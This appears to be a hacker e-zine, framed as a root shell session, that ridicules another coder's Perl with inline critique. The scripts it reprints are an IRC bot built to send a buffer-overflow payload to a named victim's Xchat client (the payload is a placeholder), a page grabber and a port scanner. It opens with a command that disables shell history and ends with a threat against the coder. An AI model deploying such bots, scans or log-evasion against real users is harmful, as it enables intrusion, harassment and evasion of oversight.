[root@localhost ~]# unset HISTFILE ; unset SAVEHIST ; cat > /etc/motd ###### ## ,-------, ,-----, ## | _____| |__, | ,--, ## | | ,_______, | | |__| ## | | ,-, |_______| | | ,--, ,-------, ,-------, ## | |___| | | | | | | ,-, | | ___| ## |_______| |__| |__| |__| |__| |______| ## -=[ zine ]=- ###### Welcome back to G-line. In this issue, we're going to be taking a slightly different course of action. And you'll also notice the lack of leet speak. Here at G-line, we feel that leet speak should only be used for ownings. And, this is not an owning (don't worry, more will come soon). Rather, this is a chance for us to relax and laugh at Ethernet's coding abilities. As you'll soon see, he codes a fair amount of Perl, and sucks horribly at it. G-line was actually embarrassed to put out this issue, the code is so poor. But hey, life goes on, eh? Sadly, this was far too easy... ## # Note: Our comments have been inserted in this format ## 1. Name: WarBot (Xchat Exploiter) His notes: RippaWallet found a BOF for Xchat 2.6.4-1 so i wrote a quick bot to exploit it. Code: use IO::Socket; ## # No sh-bang line? # No warnings? # No lexical variables? ## #IRC exploiter by Ethernet #Uses the Buffer Overflow Exploit for Xchat 2.6.4-1 #Be sure the person you use this on this version or it'll fuck up my $message; my $server = "irc.enigmagroup.org"; #server my $nick = "WarBot";#Bot Nick my $port = "6667";#Port my $channel = "#enigmagroup";#Channel my $victim = "#Locus7s"; #Set this to the channel name to display it in the main convo - Set it to the victim name to make it private my $sock = new IO::Socket::INET(PeerAddr => $server, PeerPort => $port, Proto => 'tcp'); ## # No error checking for the socket? ## print $sock "NICK $nick\r\n"; print $sock "USER $nick S * : EtherBot\r\n"; #You can change the real name also ## # Hasn't anyone told you not to quote variables? # print $sock "NICK ", $nick, "\n"; ## ## # If you think the bracing style is bad now, just wait until later ## while (my $input = <$sock>) { if ($input =~ /004/) { last; } #Error handling elsif ($input =~ /433/) { die "Nickname is already in use."; } } ## # Again with the quoting... ## print $sock "JOIN $channel 1\n"; while (my $input = <$sock>) { chop $input; print "$input\n"; ## # Why chop() and then just add the newline again? # chomp() is the correct function in any case. # And, QUIT QUOTING YOUR SCALARS! ## if ($input =~ "PRIVMSG $channel : LEAAVE") { ## # Why are you quoting the regex here? # You did it correctly above when checking for nicks. # if($input =~ /PRIVMSG $channel : LEAAVE/) ## print $sock "PRIVMSG $channel :I've had enough of you losers. I'm leaving.\r\n"; print $sock "QUIT\r\n"; die(); ## # This is great. Anyone can make the bot leave. Nice job. # Also, die() is typically used when something has gone wrong. # Your usage of it earlier (setting up the nicks) was appropriate. # For this, I suggest you use exit(). # http://www.sunsite.ualberta.ca/Documentation/Misc/perl-5.6.1/pod/perlfunc/exit.html # And as always, DON'T QUOTE THE SCALARS! ## }else{ ## # Really, }else{... # I haven't seen that since I read coding tutorials form the 1990's.. # Also, TAB YOUR CODE! ## if($input =~ "") { #Will do it right when it gets in print $sock "PRIVMSG $victim :xxxxxxxxxxxxx\r\n"; #The actual exploit } ## # No need for the if() statement. # just: # print $sock "PRIVMSG ", $victim, " :xxxxxxxxxxxxx\n"); # Quit quoting the scalars! ## if($input =~ "has quit\r\n") { #Verification that the target has been 'taken care of' :) print $sock "PRIVMSG $channel :TARGET DESTROYED\r\n"; print $sock "PRIVMSG $channel :DISCONNECTING..\r\n"; #Leaves die(); ## # This should be exit. # Your quoting of variables was horrible. # Your tabbing was horrible. # Your regexes were clumsy and poorly written. ## } } } EOF 2. Name: WebGrab.pl His notes: This is a simple little script to snatch a websites source code :) Code: #WebGrab.pl #By Ethernet #Ver 1.3 use Net::HTTP; ## # Again, no sh-bang line? # What are you, a Windows user? # No warnings? # No lexical vaiables? # Allow me to explain something to you. # It's a little pragma called strict. Strict is used for lexical variables. # These are varaiables that must be declared in scope. Not only does it keep # the code neater, but it also makes it faster, and forces you to use better # practices. ## print "Welcome to Ethernets Source Code Grabber\n"; print "******************Enjoy*****************\n\n"; print "Website to Grab: "; chop ($site=); ## # chomp(my $site = ); # Or, we can even get it from the command line: # my $site = shift || die qq(Usage: $0 \n); ## print "Connecting to $site..."; ## # Again with the quoting of the scalars... ## ## # Hmm.. this looks familair... # $ man Net::HTTP # Net::HTTP(3) User Contributed Perl Documentation Net::HTTP(3) # # NAME # Net::HTTP - Low-level HTTP client connection # # NOTE # This module is experimental. Details of its interface is likely to # change in the future. # # SYNOPSIS # use Net::HTTP; # my $s = Net::HTTP->new(Host => "www.perl.com) || die $@; # $s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0"); # my($code, $mess, %h) = $s->read_response_headers; # # while (1) { # my $buf; # my $n = $s->read_entity_body($buf, 1024); # last unless $n; # print $buf; # } ## my $s = Net::HTTP->new(Host => "$site") || die $@; #Connect to site $s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0"); my($code, $mess, %h) = $s->read_response_headers; ## # Good job, you can rip code from man pages. ## print "\nConnected."; print "\nAccessing HTML code...\n"; while (1) { my $buf; my $n = $s->read_entity_body($buf, 1024); die "read failed: $!" unless defined $n; ## # Well, at least you can change one line. # Also, you can clearly see where the ripped code starts. # The variables are suddenly declared with 'my' and they're not quoted. ## last unless $n; print $buf; #Display the source code } ## # exit; ## EOF 3. Name: PortScanner His notes: Xendz has one too but mines different :) Code: #!/usr/bin/perl #My first port scanner #By Ethernet #Ver. 1.2 ## # Wow, will you look at that! An sh-bang line! # Too bad there's still no warnings or lexical variables though. ## print "\n\n***Port Scanner***\n\n"; use IO::Socket; ## # You appear to be declaring the variables with 'my'. # Why not 'use strict;' ? ## my ($line, $port, $sock, @servers); my $VERSION='1.2'; #The version number :) ## # Typically we type global constants in all caps. # my is not for global variables, but it doesn't matter in your case, # as you're not using them. # Learn to put things in context. ## ($server = $ARGV[0]) || &usage; #Server to start ## # Am I beginning to see an addiction to parantheses? # & is a cheap hack. # Also allow me to introduce you to our little friend called shift. # shift pulls the indexes off of an array, starting at 0. # my $server = shift || usage(); ### $begin = ($ARGV[1] || 0); #Begining port - or -all flag ## # Yes, he's falen victim to the parantheses. ## $maxport = ($ARGV[2] || 0); #Ending port ## # Wow, that was long and unneeded. # my ($server, $begin, $maxport) = @ARGV; ## if($ARGV[1] == "-all") { #Custom function to scan 'all' ports (1 - 3000) ## # Ah, writing getopts() style routines by hand without knowing the # language or using regexes. Good job. ## $begin = (1); $maxport = (3000); ## # Why are you placing parantheses all over the place? ## print "Starting a scan of all ports (1 - 3000) on $ARGV[0] ...\n\n"; ## # Again, what's up with the quoting? ## for ($port=$begin;$port<=$maxport;$port++) { ## # In Perl, we have a nice little loop called foreach(). # foreach my $port ($begin...$maxport) { # Go back to PHP. ## $sock = IO::Socket::INET->new(PeerAddr => $server, #Connect to target PeerPort => $port, Proto => 'tcp'); ## # Ever hear of tabbing, or not quoting vars needlessly? # You may also want to set the Timeout value so tthe scan doesn't take years... ## if ($sock) { print "::$port [OPEN]::\n"; #Display if the port is open or closed ## # There's an interesting little condition that can occur when you have too # many filehandles open on your system. It will deny you any more (the max is # usually around 1024). Now, under most circumstances, the sockets will # eventually close themselves. However, some protocols (such as FTP) do not # time out very quickly. Therefore, the sockets will remain open longer, # take up unneeded filehandles, and consume bandwidth. # Never fear, there is a solution. It's called close(). # Read about it at: # http://www.sunsite.ualberta.ca/Documentation/Misc/perl-5.6.1/pod/perlfunc/close.html # close $sock; ## } else { print "-$port [Closed]-\n"; ## # What's up with the quoting? ## } } # End for sub usage { #How to use information below ## # Wow, you've figured out subroutines. ## print "\nUsage: Scan.pl hostname [start at port number] [end at port number]\n"; print "Other, custom flags: \n-vnc**\n-all\n(more to come)"; exit(0); ## # In Perl, exit() automatically exits witha status of 0. # exit; ## } EOF Sadly, that's all the code that we were able to find. There was another IRC bot, but it was so similar to the one that we already examined that we didn't bother to put it in the zine. Ethernet, learn Perl before you try and code. Go back to PHP. PS: We're coming for you. ## # EOF ## [root@localhost ~]#